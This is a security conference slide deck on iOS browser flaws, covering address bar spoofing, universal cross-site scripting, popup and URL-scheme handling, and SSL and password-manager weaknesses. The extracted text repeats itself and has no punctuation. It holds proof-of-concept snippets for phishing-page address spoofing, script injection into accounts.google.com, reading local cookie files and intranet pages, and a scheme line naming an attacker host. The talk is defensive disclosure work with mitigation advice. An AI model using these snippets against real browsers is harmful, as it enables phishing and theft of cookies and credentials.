bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
